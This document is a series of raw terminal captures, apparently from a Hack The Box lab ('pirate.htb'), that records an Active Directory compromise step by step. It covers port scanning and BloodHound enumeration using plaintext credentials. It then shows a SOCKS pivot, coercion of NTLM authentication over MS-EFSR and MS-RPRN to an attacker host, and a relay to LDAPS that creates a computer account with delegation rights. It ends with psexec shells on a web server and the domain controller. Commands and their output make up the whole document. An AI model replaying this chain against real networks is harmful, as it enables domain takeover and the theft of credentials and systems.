```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.244.95
[RustScan ASCII banner]
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog          :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.244.95:53
Open 10.129.244.95:88
Open 10.129.244.95:80
Open 10.129.244.95:135
Open 10.129.244.95:139
Open 10.129.244.95:389
Open 10.129.244.95:445
Open 10.129.244.95:464
Open 10.129.244.95:593
Open 10.129.244.95:636
Open 10.129.244.95:2179
Open 10.129.244.95:3268
Open 10.129.244.95:3269
Open 10.129.244.95:5985
Open 10.129.244.95:9389
Open 10.129.244.95:49666
Open 10.129.244.95:49685
Open 10.129.244.95:49688
Open 10.129.244.95:49689
Open 10.129.244.95:49686
Open 10.129.244.95:49913
Open 10.129.244.95:49934
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-15 07:52 -0400
Initiating Ping Scan at 07:52
Scanning 10.129.244.95 [4 ports]
Completed Ping Scan at 07:52, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:52
Completed Parallel DNS resolution of 1 host. at 07:52, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:52
Scanning 10.129.244.95 [22 ports]
Discovered open port 445/tcp on 10.129.244.95
Discovered open port 53/tcp on 10.129.244.95
Discovered open port 139/tcp on 10.129.244.95
Discovered open port 49686/tcp on 10.129.244.95
Discovered open port 135/tcp on 10.129.244.95
Discovered open port 49688/tcp on 10.129.244.95
Discovered open port 49685/tcp on 10.129.244.95
Discovered open port 389/tcp on 10.129.244.95
Discovered open port 5985/tcp on 10.129.244.95
Discovered open port 80/tcp on 10.129.244.95
Discovered open port 3269/tcp on 10.129.244.95
Discovered open port 49913/tcp on 10.129.244.95
Discovered open port 88/tcp on 10.129.244.95
Discovered open port 9389/tcp on 10.129.244.95
Discovered open port 49689/tcp on 10.129.244.95
Discovered open port 2179/tcp on 10.129.244.95
Discovered open port 464/tcp on 10.129.244.95
Discovered open port 3268/tcp on 10.129.244.95
Discovered open port 49666/tcp on 10.129.244.95
Discovered open port 49934/tcp on 10.129.244.95
Discovered open port 636/tcp on 10.129.244.95
Discovered open port 593/tcp on 10.129.244.95
Completed SYN Stealth Scan at 07:52, 0.23s elapsed (22 total ports)
Nmap scan report for 10.129.244.95
Host is up, received echo-reply ttl 127 (0.096s latency).
Scanned at 2026-03-15 07:52:35 EDT for 0s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 126
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
2179/tcp  open  vmrdp            syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49685/tcp open  unknown          syn-ack ttl 127
49686/tcp open  unknown          syn-ack ttl 127
49688/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49913/tcp open  unknown          syn-ack ttl 127
49934/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
           Raw packets sent: 26 (1.120KB) | Rcvd: 24 (1.096KB)
```
```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodhound-python -c All -u 'pentest' -p 'p3nt3st2025!&' -ns 10.129.5.32 -d pirate.htb -dc DC01.pirate.htb --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.pirate.htb:88)] [Errno 113] No route to host
INFO: Connecting to LDAP server: DC01.pirate.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: DC01.pirate.htb
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: WEB01.pirate.htb
INFO: Querying computer: 
INFO: Querying computer: DC01.pirate.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 23S
INFO: Compressing output into 20260315150937_bloodhound.zip
```
```
[*] Waiting for new connection...
[*] Connection from node 10.129.5.32:50886 is set up successfully! Nodeid is 0
(admin) >> use 0
(node 0) >> socks 1080
[*] Trying to listen on 0.0.0.0:1080......
[*] Waiting for agent's response......
[*] Socks start successfully!
```
```
[info] Starting coerce mode
[info] Scanning target 192.168.100.2
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:135... OK
[*] DCERPC portmapper discovered ports: 49664,49665,49668,49705,49706,49679,49685
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK
[+] DCERPC port '49679' is accessible!
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK
[+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK
[>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszL
[!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.14.214\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK
[>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(ps
[!] (RPC_S_INVALID_NET_ADDR) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.14.214\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[+] SMB named pipe '\PIPE\eventlog' is accessible!
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\10.10.14.21
[!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\10.10.14.214\6N9PO4W7\aa')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\bW
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\bWJ6zkPG\file.txt\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\VC
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\VCtcSqNA\\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\t5
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\t5oFllGy\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214@80
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214@80/u27\share\file.txt\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\JfHAvDy3\file.txt\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\kJUTdRXY\\x00')
[proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK
[>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\69F0exzP\x00')
```
```
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.244.95, attacking target ldaps://10.129.244.95
[*] Authenticating against ldaps://10.129.244.95 as PIRATE/WEB01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] Adding new computer with username: QZQHPXWV$ and password: 3h/:0DYE,,w6:X, result: OK
[*] Delegation rights modified succesfully!
[*] QZQHPXWV$ can now impersonate users on WEB01$ via S4U2Proxy
[*] All targets processed!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-11 (process_request_thread): Connecti
```
```
[proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK
[*] Requesting shares on WEB01.pirate.htb.....
[*] Found writable share ADMIN$
[*] Uploading file fokFUnmH.exe
[*] Opening SVCManager on WEB01.pirate.htb.....
[*] Creating service uPIV on WEB01.pirate.htb.....
[*] Starting service uPIV.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.
```
```
(impacket-venv) ┌─[root@htb-tfqa3uuzek]─[/home/skyarrow/impacket-venv]
└──╼ #psexec.py -k -no-pass Administrator@DC01.pirate.htb -target-ip 10.129.244.95
Impacket v0.14.0.dev0+20260320.93755.d400a6aa - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.129.244.95.....
[*] Found writable share ADMIN$
[*] Uploading file hElrLNZu.exe
[*] Opening SVCManager on 10.129.244.95.....
[*] Creating service vBnl on 10.129.244.95.....
[*] Starting service vBnl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.
```